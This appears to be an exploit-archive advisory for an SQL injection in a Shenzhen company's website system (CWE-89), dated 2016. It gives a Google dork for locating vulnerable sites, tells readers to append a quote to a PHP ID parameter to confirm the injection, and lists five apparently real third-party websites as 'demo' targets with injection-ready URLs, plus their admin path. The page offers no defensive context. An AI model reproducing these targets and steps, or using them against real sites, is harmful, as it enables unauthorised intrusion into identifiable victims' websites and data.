深圳市亿天联网站系统 SQL Injection

2016.07.04

Credit: dreamdroid

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:深圳市亿天联

 ######################
# Exploit Title : 深圳市亿天联网站系统 SQL Injection
# Exploit Author : dreamdroid
# Google Dork : intext:深圳市亿天联
# Date: 2016/07/04
# Tested On : Win 7
# Contact: 2871906043@qq.com
######################
#
# Vulnerable File : ×.php
# Request Method: GET
# Describe : Search dork and select Target. Put standard-map.php?ID=12%27 After url such as :
# http://site.com/×.php?ID=12%27
# You See Error And You Can Inject
#
# Demo :
# http://www.szddfs.com.cn/view.php?id=38’
# http://www.sztpr88.com/about.php?id=191'
# http://xyh-gd.com/view.php?id=1069'
# http://www.ymjcolor.com/view.php?id=572'
# http://www.hsd-express.cn/faqshow.php?cid=148&id=229'
#
#admin page: /admin/
#
######################
# Discovered By : dreamdroid
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

深圳市亿天联网站系统 SQL Injection

Dork: intext:深圳市亿天联

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.